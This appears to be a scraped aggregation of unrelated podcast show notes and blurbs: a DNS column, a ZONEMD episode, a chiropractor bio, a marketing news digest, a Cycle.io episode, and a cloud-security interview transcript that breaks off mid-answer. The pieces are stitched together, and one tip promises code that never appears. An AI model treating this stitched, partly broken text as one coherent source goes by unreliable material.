When pointing your browser at a website, the browser needs to find the site's IP address, so it calls on a domain name service server. Using a better DNS server can improve the browser's response time, but only by a bit. There are other reasons to use DNS not from your internet service provider. In Short Circuits: Adobe's Firefly (generative fill) function, even in beta, has shown itself to be surprisingly good at some tasks. It can also be used to create an oil-painting effect on a photograph. • After working with Beeper, a universal chat application, I'm ready to talk about its advantages and (because it's still a beta app) some of the areas that need refinement. Twenty Years Ago (only on the website): In 2003, hardware and software for video editing were still expensive, but the future was clear.

In this episode of PING, Verisign fellow Duane Wessels presents the ZONEMD resource record, defined in RFC8976. The “MD” in ZONEMD stands for “message digest” and this resource record (RR) is a checksum over the state of a zone, including all its records and the zone serial record (“start of authority” or SOA) which includes a serial number. This means that by fetching an entire zone, either in the DNS or “out of band” from an FTP or Web server or however you receive it, if it has the ZONEMD record you have a way to check that the entire zone, as it should be for that serial, is exactly what you have in-hand. ZONEMD is going to permit people who copy zones to serve them (locally, or more widely) now have a basis to trust the state of the zone before publishing it. Duane talks about the long lifetime of this idea with roots back into the 1990s, and the road to RFC8976 taken by the co-authors. A ZONEMD record with an un-testable signature will be placed in the root zone of the DNS in September of this year, and will become testable in December to allow time for the community to understand it's behaviour. This podcast is accompanied by a repost of a Verisign blog Duane wrote recently which has just been republished here on the APNIC Blog: Adding ZONEMD protections to the root zone  Read more about DNS, ZONEMD, and other blogs and podcasts by Duane on the APNIC Blog and elsewhere online: The Root of the DNS revisited(2023, Geoff Huston) Notes from DNS OARC 38 (2022 APNIC Blog post by Geoff Huston) Notes from DNS OARC 35 (2021 APNIC Blog post by Geoff Huston) RFC8976 (2021 RFC D. Wessels, P. Barber – Verisign; M. Weinberg – Amazon; W. Kumari – Google; & W. Hardaker – USC/ISI) [Podcast] A look back at notable root zone changes (Duane Wessels on PING discusses 3 significant root zone changes over the last decade)

Dr. Taylor Premer grew up in a small town in Nebraska, attending the University of Nebraska-Lincoln to study Nutrition Science and then chiropractic school at Cleveland University-Kansas City. There, he served as club president of the Motion Palpation Institute club and acquired over 800 hours of continuing education experience in manual manipulation, rehabilitative exercise (DNS), kinesiology taping, manual therapy, and musculoskeletal diagnosis. In his free time, Dr. Premer enjoys reading and exploring new ways of treating patients.

Episode 169 contains the notable Digital Marketing News and Updates from the week of July 10 - 14, 2023. 1. ByteDance's CapCut Plugin Uses AI to Automate Video Creation - ByteDance, the parent company of TikTok, has released a new plugin for ChatGPT that allows users to create videos with AI. The new plugin leverages generative AI to create everything you need for publishing video content on TikTok and other social channels. It only takes a one-sentence prompt to describe the video's theme, topic, or purpose. But for higher-quality results, the more specific and detailed your prompt is, the better.2. Microsoft Advertising Announces New Features and Updates to Help Advertisers Get More Results - Microsoft Advertising has announced a number of new features and updates in July, including: Predictive Targeting - Microsoft Advertising introduced Predictive Targeting, an AI-based advertising tool that uses machine learning to automatically identify and target new audiences for increased conversions, which could save advertisers' time and boost campaign efficiency. While it offers flexible application with existing strategies, potential downsides include losing control over target audiences and possibly wasted ad spend or brand damage if incorrect audiences are exposed to ads. Generative AI And RSA - Microsoft integrated generative AI into creating and editing responsive search ads (RSA), providing AI-generated headlines and descriptions based on the advertiser's final URL. The updated experience reportedly offers neatly categorized, high-quality, and diverse recommendations in 35 detected languages, enabling advertisers to select multiple suggestions in a single click. You can also opt-in to auto-generation of assets, which dynamically creates assets when serving ads, enabling greater scalability and relevancy. RSA IF Functions - IF functions for RSAs could offer sophisticated targeting and ad customization based on device and audience. This would reduce the need for separate campaigns and enables customized messages for specific user devices or audience segments. Automated multimedia ads within Dynamic Search Ads (DSA) groups will reportedly utilize AI to automatically generate rich, visually engaging ads optimized for performance using your website's content. Combining users' assets with machine learning technology, these ads will be displayed on the right side of the search results page and exclusive, with only one multimedia ad appearing per page per advertiser. Property Promotion Ads For Vacation Rentals Microsoft extended its Property Promotion Ads, which are highly visual ads designed to inspire potential travelers, including vacation rentals and hotels. It allows travel advertisers to display more property offerings on Microsoft platforms. Offering a rich, engaging experience with complete control over images and callouts, these ads could drive increased bookings with premium placements and automated management via familiar ad management workflows in the Microsoft Hotel Center, saving advertisers' time. Enhancements To Universal Event Tracking Microsoft Advertising has enhanced its Universal Event Tracking (UET) tag dashboard, troubleshooting and monitoring UET events in real-time for more efficient testing and quality assurance. Additionally, the UET overview tab now provides an expanded lookback period to review the performance of your tag across various dimensions, such as events, parameters, and event types. Data-driven attribution (DDA) reporting became generally available, using advanced machine learning to calculate the actual contribution of each ad interaction on conversion, differing from the traditional Last Click Attribution (LCA) model. This model comparison report, accessible through Reports > Default Reports > Performance > Conversion Model Compare, should allow for thorough analysis with a wide range of metrics at the ‘Keyword' grain. Deprecation Of Keyword Planner Legacy Features Microsoft Advertising is deprecating several legacy features in Keyword Planner, including various service operations and the Product Category feature, due to their outdated nature and incompatibility with the system, effective August 21, 2023. 3. YouTube's New Video Title Suggestions: A Must-Try for Creators - YouTube is rolling out a new feature that will suggest video titles for creators based on the video's transcript and description. This new feature is designed to help creators create more effective titles that will attract more viewers.The title suggestions are generated by an AI model that analyzes the video's transcript and description. The model takes into account factors such as the most common words and phrases in the video, as well as the keywords that are likely to be searched for by viewers.The title suggestions are optional, but creators can choose to use them if they want. The suggestions are also updated over time as the AI model learns more about the video.4. Google Ads Policy Update: Repeated Violations Could Result in Account Suspension - Google Ads is updating its Circumventing Systems policy this month to clarify that the policy prohibits repeated and simultaneous policy violations across any of your accounts, including using two or more accounts to post ads that violate any Google Ads policy.The update also clarifies that the policy applies to both manual and automated violations. This means that if you are caught using automated software to circumvent Google's systems, your account could be suspended.Google takes violations of this policy very seriously and considers them egregious. If they find violations of this policy, they will suspend your Google Ads accounts upon detection and without prior warning, and you will not be allowed to advertise with Google Ads again.To avoid violating the Circumventing Systems policy, it is important to understand what is considered a violation. Cloaking (showing different content to certain users, including Google, than to other users) that aims at or results in interference with Google's review systems, or hides or attempts to hide non-compliance with Google Ads policies, such as: Redirection to non-compliant content Using dynamic DNS to switch page or ad content Manipulating site content or restricting access to so many of your landing pages that it makes it difficult to meaningfully review your ad, site, or account Using click trackers to redirect users to malicious sites Whether repeated or simultaneous, policy violations across any of your accounts, including using 2 or more accounts to post ads that violate this or any other Google Ads policy. For example, creating new domains or accounts to post ads that are similar to ads that have been disapproved for this or any other Google Ads policy. Bypassing enforcement mechanisms and detection by creating variations of ads, domains or content that have been disapproved (for this or any Google Ads policy) or using techniques in text, images, or videos to obfuscate sexually explicit content After a previous suspension decision, attempting to use the Google Ads system again by creating new accounts in order to re enter the system Abusing Google Ads product features in order to show policy non-compliant content to users and/or gain additional traffic Submitting false information as part of our verification programs As an FYI, Google Search (organic results, not paid) also has a circumvention spam policy.5. Building Trust and Increasing Sales with Google Merchant Center - Google Merchant Center is a free service that allows you to submit your business and product information to Google so that it can be displayed in Google results. This can be a great way to increase visibility for your products and drive traffic to your website.  Google has posted a new document in the Google Merchant Center area on how to build trust with your customers. The document goes through your business identity, your transparency, your online reputation, and your professional design.Google explained, that it wants "Google to be a safe and trustworthy place for both our customers and retailers. Customers should feel confident about the offers they are browsing and the businesses they are purchasing from. Sometimes it can take some time before a sufficient level of trust is established and before we consider it safe to display your offers to customers. This assessment is an ongoing process and since we know that customers are likely to do research about your products and business, we may review multiple signals from across the web. The more we know about your business, the better we are able to represent you."Here is that list of what Google said customers value in building trust with your business: Business Identity: Provide the official business name that you use across the web and avoid any mismatches in your registered business name and domain name. Include an “about us” page on your website to show your authenticity and tell customers your unique story. Let customers know that they can follow you on social media profiles and link to those pages from your website. Transparency: Be clear and provide detailed information about your policies including shipping, returns and privacy policies. Be transparent about your business model and how you operate. Online reputation: Help potential customers understand how to use your products or how other customers have used them. Show reviews and testimonials about your products and business. If you've received any badges or seals of approval from official third-party sources, make sure that you mention these. Clearly communicate how customers can interact with you by making sure they know how to get in touch with you and how your customer support is set-up. If you publish a blog post or if your business was mentioned in an article, make sure your customers know about this. Professional design: Install an SSL certificate so customers know that their sensitive data is retrieved and stored securely without being intercepted by hackers. Your website should be accessible for all customers, easy to navigate, and shouldn't contain any unnecessary redirects or redirects to broken links. Avoid placeholders for text and images; this gives the feeling that the website is unfinished. So there you have it, your blueprint from Google on how you can get your customers to trust you. :)But how does Google know if your customers trust you? Google put down this list of how you can help Google learn more about your business: Provide information in the Business information settings in Merchant Center. Link the relevant third-party platforms to Merchant Center. Create and verify a Google Business Profile. Follow our SEO guidelines to improve the visibility of your website on Google and to provide a good customer experience. Improve your eligibility for seller ratings, by opting into Google Customer Reviews or other third-party review services. Match your product data in your product feed with your website to ensure customers see the same information, such as prices, across both.6.  Don't Let Your Syndicated Content Hurt Your SEO! - Syndicated content is content that is published on multiple websites. This can be a problem for SEO, as it can lead to duplicate content issues. Google recommends that publishers use the noindex tag on syndicated content to prevent it from being indexed by search engines.The noindex tag is a meta tag that tells search engines not to index a particular page. This can be useful for a variety of reasons, including preventing duplicate content issues, preventing spam, and improving page load times.To use the noindex tag, simply add the following code to the head section of your page:This will tell search engines not to index the page. Google recommends publishers push syndication partners to use noindex to prevent syndicated content from outranking original news sources.7. Google Explains How Google Discover Works - Google's Martin Splitt answered a question on the July 2023 Office Hours session about what to do after traffic from Google Discover traffic dries up. Martin offers quick insights into what Google Discover focuses on.Google Discover is a personalized feed of articles that match user interests. It is a great way to drive traffic to your website.Google Discover uses a variety of factors to determine which articles to show users, including the user's search history, the websites they have visited, and the topics they have clicked on. This means that the best way to optimize your content for Google Discover is to create high-quality content (while Google shows relevant evergreen content, the system is also looking for fresh content on particular topics that tend to need freshness.) that is relevant to your target audience. According to Martin, “Generally, content that is indexed and meets our content guidelines can be included in Discover. But …Discover traffic is hard to predict and will ebb and flow. The content in Discover is automatically refreshed as new content is published, however Discover is designed to show all types of helpful content from across the web, not just newly published content. A common mistake I see in the SEO industry is focusing too hard on keywords or the semantics of words and not enough on topics. In my experience, focusing on the semantics of words is a waste of time. Focus on topics of interest. Topics are about what's going on in the industry and understanding what are people interested in right now.”Here are some specific tips for optimizing your content for Google Discover: Use clear and concise titles that accurately reflect the content of your article. Use relevant keywords throughout your article. Include a well-written meta description that summarizes the content of your article. Use high-quality images and videos. Promote your articles on social media. 8. Your Page is Discovered, but Not Indexed! Here's How to Fix It - Google's John Mueller answered whether removing pages from a large site helps to solve the problem of pages that are discovered by Google but not crawled.The "Discovered - Currently Not Indexed" status in Google Search Console means that Google has found your page, but it has not yet crawled or indexed it. This can happen for a number of reasons, such as technical errors on your site, duplicate content, or low-quality content, although Google's official documentation only lists one reason. “Discovered – currently not indexed The page was found by Google, but not crawled yet. Typically, Google wanted to crawl the URL but this was expected to overload the site; therefore Google rescheduled the crawl. This is why the last crawl date is empty on the report.” If you see the "Discovered - Currently Not Indexed" status for one of your pages, there are a few things you can do to try to fix it: Check for technical errors on your site. Make sure your content is unique and high-quality. Submit your page to Google Search Console. 9. Google's SEO Advice Has Not Changed in 20 Years. Here's What You Need to Know - Google's core SEO advice has not changed in two decades. That's right, the same advice that Google gave in 2002 still applies today.In a recent post, Danny Sullivan, Google's Search Liaison, shared a screenshot of Google's advice from 2002. The advice reads: "Make pages for users, not for search engines."Sullivan went on to say that Google's core SEO advice has not changed because it is still the best way to create high-quality content that people will want to read.So, what does it mean to "make pages for users, not for search engines"? It means that you should focus on creating content that is informative, helpful, and engaging. You should also use keywords throughout your content, but you should not stuff your content with keywords.If you follow Google's core SEO advice, you will be well on your way to ranking well in search results.Here are some additional tips for following Google's core SEO advice: Write clear and concise titles that accurately reflect the content of your page. Use relevant keywords throughout your content, but don't overdo it. Create high-quality images and videos. 10. LLMs for SEO: A Recipe for Disaster? -  Large language models (LLMs) are a powerful tool that can be used for a variety of tasks, including generating text, translating languages, and writing different kinds of creative content. However, LLMs can also be used for SEO purposes, and this can lead to disaster if not done correctly.One of the main problems with using LLMs for SEO is that they can generate content that is not relevant to the user's search intent. This can lead to a decrease in organic traffic, as users will be less likely to click on links to pages that are not relevant to their search.Another problem with using LLMs for SEO is that they can generate content that is plagiarized or duplicate. This can lead to a site being penalized by Google, which can result in a decrease in search rankings.If you are considering using LLMs for SEO, it is important to be aware of the risks involved. You should also make sure that you are using a reputable LLM provider that has a good track record of generating high-quality content.Sources: https://twitter.com/rustybrick/status/1671848255792054272 and https://flower-nutria-41d.notion.site/No-GPT4-can-t-ace-MIT-b27e6796ab5a48368127a98216c76864

Bret and Matt welcome Jake Warner back to the show to talk about LowOps. What does LowOps mean? What can Cycle offer us as an alternative to Swarm and Kubernetes?Jake Warner is the CEO and founder of Cycle.io. And I had him on the show a few years ago when I first heard about Cycle and I wanted to get an update on their platform offering. On this show we generally talk about Docker and Kubernetes but I'm also interested in any container tooling that can help us deploy and manage container based applications. Cycles' platform is an alternative container orchestrator as a service. In fact, they go beyond what you would provide normally with a container orchestrator and they provide OS updates, networking, the container runtime, and the orchestrator all in a single offering as a way to reduce the complexity that we're typically faced with when we're deploying Kubernetes. While I'm a fan of Docker swarm due to its simplicity, it still requires you to manage the OS underneath, to configure networking sometimes, and the feature releases have slowed down in recent years. But I still have a soft spot for those solutions that are removing the grunt work of OS and update management and helping smaller teams get more work done. I think Cycle has the potential to do that for a lot of teams that aren't all in on the Kubernetes way, but still value the container abstraction as the way to deploy software to servers.Live recording of the complete show from May 18, 2023 is on YouTube (Ep. #217). Includes demos.★Topics★Cycle.io website@cycleplatform on YouTube Support this show and get exclusive benefits on Patreon, YouTube, or bretfisher.com!★Join my Community★Get on the waitlist for my next live course on CI automation and gitops deploymentsBest coupons for my Docker and Kubernetes coursesChat with us and fellow students on our Discord Server DevOps FansGrab some merch at Bret's Loot BoxHomepage bretfisher.comCreators & Guests Bret Fisher - Host Cristi Cotovan - Editor Beth Fisher - Producer Matt Williams - Host Jake Warner @ Cycle.io - Guest (00:00) - Intro (02:25) - Introducing the guests (03:17) - What is Cycle? (12:33) - Deploying and staying up to date with Cycle (14:21) - Cycle's own OS and updates (17:12) - Core OS vs Cycle (22:10) - Use multiple providers with Cycle (22:52) - Run Cycle anywhere with infrastructure abstraction layer (24:33) - No latency requirement for the nodes (28:28) - DNS for container-to-container resolution (29:54) - Migration from one cloud provider to another? (31:17) - Roll back and telemetry (32:48) - Full-featured API (37:12) - Cycle data volumes (38:35) - Backups (40:24) - Autoscaling (43:00) - Getting started (44:40) - Control plane and self-hosting (44:58) - Question about moving to Reno (45:59) - Built from revenue and angels; no VC funding

Bob Bell is joined by Cookeville High School's Scott Waites and two members of the cyber security team, Laurae Thaete and Landon Foister. The group talks about how CTE fits into Cookeville High School and TCAT Livingston, how fire walls work and the ways they keep a computer safe, and what DNS poisoning is. Listen to the latest Local Matters Podcast… Presented by Office Mart. Visit them at 215 S Jefferson Ave in Cookeville to see what they can do for your office News Talk 94.1 · Presented By Office Mart

Brandon Sherman, Cloud Security Engineer at Temporal Technologies Inc., joins Corey on Screaming in the Cloud to discuss his experiences at recent cloud conferences and the ongoing changes in cloud computing. Brandon shares why he enjoyed fwd:cloudsec more than this year's re:Inforce, and how he's seen AWS events evolve over the years. Brandon and Corey also discuss how the cloud has matured and why Brandon feels ongoing change can be expected to be the continuing state of cloud. Brandon also shares insights on how his perspective on Google Cloud has changed, and why he's excited about the future of Temporal.io.About BrandonBrandon is currently a Cloud Security Engineer at Temporal Technologies Inc. One of Temporal's goals is to make our software as reliable as running water, but to stretch the metaphor it must also be *clean* water. He has stared into the abyss and it stared back, then bought it a beer before things got too awkward. When not at work, he can be found playing with his kids, working on his truck, or teaching his kids to work on his truck.Links Referenced: Temporal: https://temporal.io/ Personal website: https://brandonsherman.com TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: In the cloud, ideas turn into innovation at virtually limitless speed and scale. To secure innovation in the cloud, you need Runtime Insights to prioritize critical risks and stay ahead of unknown threats. What's Runtime Insights, you ask? Visit sysdig.com/screaming to learn more. That's S-Y-S-D-I-G.com/screaming.My thanks as well to Sysdig for sponsoring this ridiculous podcast.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. I'm joined today by my friend who I am disappointed to say I have not dragged on to this show before. Brandon Sherman is a cloud security engineer over at Temporal. Brandon, thank you for finally giving in.Brandon: Thanks, Corey, for finally pestering me enough to convince me to join. Happy to be here.Corey: So, a few weeks ago as of this recording—I know that time is a flexible construct when it comes to the podcast production process—you gave a talk at fwd:cloudsec, the best cloud security conference named after an email subject line. Yes, I know re:Inforce also qualifies; this one's better. Tell me about what you talked about.Brandon: Yeah, definitely agree on this being the better the two conferences. I gave a talk about how the ground shifts underneath us, kind of touching on how these cloud services that we operate—and I'm mostly experienced in AWS and that's kind of the references that I can give—but these services work as a contract basis, right? We use their APIs and we don't care how they're implemented behind the scenes. At this point, S3 has been rewritten I don't know how many times. I'm sure that other AWS services, especially the longer-lived ones have gone through that same sort of rejuvenation cycle.But as a security practitioner, these implementation details that get created are sort of byproducts of, you know, releasing an API or releasing a managed service can have big implications to how you can either secure that service or respond to actions or activities that happen in that service. And when I say actions and activity, I'm kind of focused on, like, security incidents, breaches, your ability to do incident response from that.Corey: One of the reasons I've always felt that cloud providers have been cagey around how the services work under the hood is not because they don't want to talk about it so much as they don't want to find themselves committed to certain patterns that are not guaranteed as a part of the definition of the service. So if, “Yeah, this is how it works under the hood,” and you start making plans and architecting in accordance with that and they rebuild the service out from under you like they do with S3, then very often, those things that you depend upon being true could very easily no longer be true. And there's no announcement around those things.Brandon: No. It's very much Amazon is… you know, they're building a service to meet the needs of their customers. And they're trying to grow these services as the customers grow along with them. And it's absolutely within their right to act that way, to not have to tell us when they make a change because in some contexts, right, Amazon's feature update might be me as a customer a breaking change. And Amazon wants to try and keep that, what they need to tell me, as small as possible, probably not out of malice, but just because there's a lot of people out there using their services and trying to figure out what they've promised to each individual entity through either literal contracts or their API contracts is hard work. And that's not the job I would want.Corey: No. It seems like it's one of those thankless jobs where you don't get praise for basically anything. Instead, all you get to do is deal with the grim reality that people either view as invisible or a problem.Brandon: Yeah. It sort of feels like documentation. Everyone wants more and better documentation, but it's always an auxiliary part of the service creation process. The best documentation always starts out when you write the documentation first and then kind of build backwards from that, but that's rarely how I've seen software get made.Corey: No. I feel like I left them off the hook, on some level, when we say this, but I also believe in being fair. I think there's a lot of things that cloud providers get right and by and large, with any of the large cloud providers, they are going to do a better job of securing the fundamentals than you are yourself. I know that that is a controversial statement to some folks who spent way too much time in the data centers, but I stand by it.Brandon: Yeah, I agree. I've had to work in both environments and some of the easiest, best wins in security is just what do I have, so that way I know what I have to protect, what that is there. But even just that asset inventory, that's the sort of thing that back in the days of data centers—and still today; it was data centers all over the place—to do an inventory you might need to go and send an actual human with an actual clipboard or iPad or whatever, to the actual physical location and hope that they read the labels on hundreds of thousands of servers correctly and get their serial numbers and know what you have. And that doesn't even tell you what's running on them, what ports are open, what stuff you have to care about. In AWS, I can run a couple of describe calls or list calls and that forms the backbone of my inventory.There's no server that, you know, got built into a wall or lost behind and some long-forgotten migration. A lot of those basic stuff that really, really helps. Not to mention then the user-managed service like S3, you never have to care about patch notes or what an update might do. Plenty of times I've, like, hesitated upgrading a software package because I didn't know what was going to happen. Control Tower, I guess, is kind of an exception to that where you do have to care about the version of your cloud service, but stuff like, yeah, these other services is absolutely right. The undifferentiated heavy lifting it's taken care of. And hopefully, we always kind of hope that the undifferentiated heavy lifting doesn't become differentiated and heavy and lands on us.Corey: So, now that we've done the obligatory be nice to cloud providers thing, let's potentially be a little bit harsher. While you were speaking at fwd:cloudsec, did you take advantage of the fact that you were in town to also attend re:Inforce?Brandon: I did because I was given a ticket, and I wanted to go see some people who didn't have tickets to fwd:cloudsec. Yeah, we've been nice to cloud providers, but as—I haven't found I've learned a lot from the re:Inforce sessions. They're all recorded anyway. There's not even an open call for papers, right, for talking about at a re:Inforce session, “Hey, like, this would be important and fresh or things that I would be wanting to share.” And that's not the sort of thing that Amazon does with their conferences.And that's something that I think would be really interesting to change if there was a more community-minded track that let people submit, not just handpicked—although I suppose any kind of Amazon selection committee is going to be involved, but to pick out, from the community, stories or projects that are interesting that can be, not just have to get filtered through your TAM but something you can actually talk to and say, “Hey, this is something I'd like to talk about. Maybe other people would find it useful.”Corey: One of the things that I found super weird about re:Inforce this year has been that, in a normal year, it would have been a lot more notable, I think. I know for a fact that if I had missed re:Invent, for example, I would have had to be living in a cave not to see all of the various things coming out of that conference on social media, in my email, in all the filters I put out there. But unless you're looking for it, you've would not know that they had a conference that costs almost as much.Brandon: Yeah. The re:Invent-driven development cycle is absolutely a real thing. You can always tell in the lead up to re:Invent when there's releases that get pushed out beforehand and you think, “Oh, that's cool. I wonder why this doesn't get a spot at re:Invent, right, some kind of announcement or whatever.” And I was looking for that this year for re:Inforce and didn't see any kind of announcement or that kind of pre-release trickle of things that are like, oh, there's a bunch of really cool stuff. And that's not to say that cool stuff didn't happen; it just there was a very different marketing feel to it. Hard to say, it's just the vibes around felt different [laugh].Corey: Would you recommend that people attend next year—well let me back up. I've heard that they had not even announced a date for next year. Do you think there will be a re:Inforce next year?Brandon: Making me guess, predict the future, something that I'm—Corey: Yeah, do a prediction. Why not?Brandon: [laugh]. Let's engage in some idle speculation, right? I think that not announcing it was kind of a clue that there's a decent chance it won't happen because in prior years, it had been pre-announced at the—I think it was either at closing or opening ceremonies. Or at some point. There's always the, “Here's what you can look forward to next year.”And that didn't happen, so I think that's there's a decent chance this may have been the last re:Inforce, especially once all the data is crunched and people look at the numbers. It might just be… I don't know, I'm not a marketing-savvy kind of person, but it might just be that a day at re:Invent next year is dedicated to security. But then again, security is always job zero at Amazon so maybe re:Invent just becomes re:Inforce all the time, right? Do security, everybody.Corey: It just feels like a different type of conference. Whenever re:Invent there's something for everyone. At re:Inforce, there's something for everyone as long as they work in InfoSec. Because other than that, you wind up just having these really unfortunate spiels of them speaking to people that are not actually present, and it winds up missing the entire forest for the trees, really.Brandon: I don't know if I'd characterize it as that. I feel like some of the re:Inforce content was people who were maybe curious about the cloud or making progress in their companies and moving to the cloud—and in Amazon's case when they say the cloud, they mean themselves. They don't mean any other cloud. And re:Inforce tries to dispel the notion there are any other clouds.But at the same time, it feels like an attempt to try and make people feel better. There's a change underway in the industry and it still is going to continue for a while. There's still all kinds of non-cloud environments people are going to operate for probably until the end of time. But at the same time, a lot of these are moving to the cloud and they want the people who are thinking about this or engaged in it, to be comforted by that Amazon that either has these services, or there's a pattern you can follow to do something in a secure manner. I think that's that was kind of the primary audience of re:Inforce was people who were charged with doing cloud security or were exploring moving their corporate systems to AWS and they wanted some assurance that they're going to actually be doing things the right way, or someone else hadn't made those mistakes first. And if that audience has been sort of saturated, then maybe there isn't a need for that style of conference anymore.Corey: It feels like it's not intended to be the same thing at re:Invent, which is probably I guess, a bigger problem. Re:Invent for a long time has attempted to be all things to all people, and it has grown to a scale where that is no longer possible. So, they've also done a poor job of signaling that, so you wind up attending Adam Selipsky's keynote, and in many cases, find yourself bored absolutely to tears. Or you go in expecting it to be an Andy Jassy style of, “Here are 200 releases, four of them good,” and instead, you wind up just having what feels like a relatively paltry number doled out over a period of days. And I don't know that their wrong to do it; I just think it doesn't align with pre-existing expectations. I also think people expecting to go to re:Inforce to see a whole bunch of feature releases are bound to be disappointed.Brandon: Like, both of those are absolutely correct. The number of releases on the slide must always increase up and the right; away we go; we're pushing more code and making more changes to services. I mean, if you look at the history, there's always new instance types. Do they count each instance type as a new release, or they not do that?Corey: Yeah, it honestly feels like that sometimes. They also love to do price cuts where they—you wind up digging into them and something like 90% of them are services you've never heard of in regions you couldn't find on a map if your life depended on it. It's not quite the, “Yeah, the bill gets lower all the time,” that they'd love to present it as being.Brandon: Yeah. And you may even find that there's services that had updates that you didn't know about until you go and check the final bill, the Cost and Usage Report, and you look and go, “Oh, hey. Look at all the services that we were using, that our engineers started using after they heard announcements at re:Invent.” And then you find out how much you're actually paying for them. [pause]. Or that they were in use in the first place. There's no better way to find what is actually happening in your environment than, look at the bill.Corey: It's depressing that that's true. At least they finally stopped doing the slides where they talk about year-over-year, they have a histogram of number of feature and service releases. It's, no one feels good about that, even the people building the services and features because they look at that and think, “Oh, whatever I do is going to get lost in the noise.” And they're not wrong. Customers see it and freak out because how am I ever going to keep current with all this stuff? I take a week off and I spend a month getting caught back up again.Brandon: Yeah. And are you going to—you know, what's your strategy for dealing with all these new releases and features? Do you want to have a strategy of saying, “No, you can't touch any of those until we've vetted and understand them?” I mean, you don't even have to talk about security in that context; just the cost alone, understanding it's someone, someone going to run an experiment that bankrupts your company by forgetting about it or by growing into some monster in the bill. Which I suspect helps [laugh] helps you out when those sorts of things happen, right, for companies don't have that strategy.But at the same time, all these things are getting released. There's not really a good way of understanding which of these do I need to care about. Which of these is going to really impact my operational flow, my security impacts? What does this mean to me as a user of the service when there's, I don't know, an uncountable number really, or at least a number that's so big, it stops mattering that it got any bigger?Corey: One thing that I will say was great about re:Invent, I want to say 2021, was how small it felt. It felt like really a harkening back to the old re:Invents. And then you know, 2022 hit, and we go there and half of us wound up getting Covid because of course we did. But it was also this just this massive rush of, we're talking with basically the population of a midsize city just showing up inside of this entire enormous conference. And you couldn't see the people you wanted to see, it was difficult to pay attention to all there was to pay attention to, and it really feels like we've lost something somewhere.Brandon: Yeah, but at the same time is that just because there are more people in this ecosystem now? You know, 2021 may have been a callback to that a decade ago. And these things were smaller when it was still niche, but growing in kind of the whole ecosystem. And parts of—let's say, the ecosystem there, I'm talking about like, how—when I say that ecosystem there, I'm kind of talking about how in general, I want to run something in technology, right? I need a server, I need an object store, I need compute, whatever it is that you need, there is more attractive services that Amazon offers to all kinds of customers now.So, is that just because, right, we've been in this for a while and we've seen the cloud grow up and like, oh, wow, you're now in your awkward teenage phase of cloud computing [laugh]? Have we not yet—you know, we're watching the maturity to adulthood, as these things go? I really don't know. But it definitely feels a little, uh… feels a little like we've watched this cloud thing grow from a half dozen services to now, a dozen-thousand services all operating different ways.Corey: Part of me really thinks that we could have done things differently, had we known, once upon a time, what the future was going to hold. So, much of the pain I see in Cloud is functionally people trying to shove things into the cloud that weren't designed with Cloud principles in mind. Yeah, if I was going to build a lot of this stuff from scratch myself, then yeah, I would have absolutely made a whole universe of different choices. But I can't predict the future. And yet, here we are.Brandon: Yep. If I could predict the future, I would have definitely won the lottery a lot more times, avoided doing that one thing I regretted that once back in my history [laugh]. Like, knowing the future change a lot of things. But at least unless you're not letting on with something, then that's something that no one's got the ability to, do not even at Amazon.Corey: So, one of the problems I've always had when I come back from a conference, especially re:Invent, it takes me a few… well, I'll be charitable and say days, but it's more like weeks, to get back into the flow of my day-to-day work life. Was there any of that with you and re:Inforce? I mean, what is your day job these days anyway? What are you up to?Brandon: What is my day job? There's a lot. So, Temporal is a small, but quickly growing company. A lot of really cool customers that are doing really cool things with our technology and we need to build a lot of basics, essentially, making sure that when we grow, that we're going to kind of grow into our security posture. There's not anything talking about predicting the future. My prediction is that the company I work for is going to do well. You can hold your analysis on that [laugh].So, while I'm predicting what the company that I'm working at is going to do well, part of it is also what are the things that I'm going to regret not having in two or three years' time. So, some baseline cloud monitoring, right? I want that asset inventory across all of our accounts; I want to know what's going on there. There's other things that are sort of security adjacent. So, things like DNS records, domain names, a lot of those things where if we can capture this and centralize it early and build it in a way—especially that users are less unhappy about, like, not everyone, for example, is hosting their own—buying their own domains on personal cards and filing for reimbursement, that DNS records aren't scattered across a dozen different software projects and manipulated in different ways, then that sets us up.It may not be perfect today, but in a year, year-and-a-half, two years, we have the ability to then say, “Okay, we know what we're pointing at. What are the dangling subdomains? What are the things that are potential avenues of being taken over? What do we have? What are people doing?” And trying to understand how we can better help users with their needs day-to-day.Also as a side part of my day job is advising a startup Common Fate. Does just-in-time access management. And that's been a lot of fun to do as well because fundamentally—this is maybe a hot take—that, in a lot of cases, you really only need admin access and read-only access when you're doing really intensive work. In Temporal day job, we've got infrastructure teams that are building stuff, they need lots of permissions and it'd be very silly to say you can't do your job just because you could potentially use IAM and privilege escalate yourself to administrator. Let's cut that out. Let's pretend that you are a responsible adult. We can monitor you in other ways, we're not going to put restrictions between you and doing your job. Have admin access, just only have it for a short period of time, when you say you're going to need it and not all the time, every account, every service, all the time, all day.Corey: I do want to throw a shout-in for that startup you advise, Common Fate. I've been a big fan of their Granted offering for a while now. granted.dev for those who are unfamiliar. I use that to automatically generate console logins, do all kinds of other things. When you're moving between a bunch of different AWS accounts, which it kind of feels like people building the services don't have to do somehow because of their Isengard system handling it for them. Well, as a customer, can I just say that experience absolutely sucks and Granted goes a long way toward making it tolerable, if not great.Brandon: Mm-hm. Yeah, I remember years ago, the way that I would have to handle this is I would have probably a half-dozen different browsers at the same time, Safari, Chrome, the Safari web developer preview, just so I could have enough browsers to log into with, to see all the accounts I needed to access. And that was an extremely painful experience. And it still feels so odd that the AWS console today still acts like you have one account. You can switch roles, you can type in a [role 00:21:23] on a different account, but it's very clunky to use, and having software out there that makes this easier is definitely, definitely fills a major pain point I have with using these services.Corey: Tired of Apache Kafka's complexity making your AWS bill look like a phone number? Enter Redpanda. You get 10x your streaming data performance without having to rob a bank. And migration? Smoother than a fresh jar of peanut butter. Imagine cutting as much as 50% off your AWS bills. With Redpanda, it's not a dream, it's reality. Visit go.redpanda.com/duckbill. Redpanda: Because Kafka shouldn't cause you nightmares.Corey: Do you believe that there's hope? Because we have seen some changes where originally AWS just had the AWS account you'd log into, it's the root user. Great. Then they had IAM. Now, they're using what used to be known as AWS SSO, which they wound up calling IAM Access Identity Center, or—I forget the exact words they put in order, but it's confusing and annoying. But it does feel like the trend is overall towards something that's a little bit more coherent.Brandon: Mm-hm.Corey: Is the future five years from now better than it looks like today?Brandon: 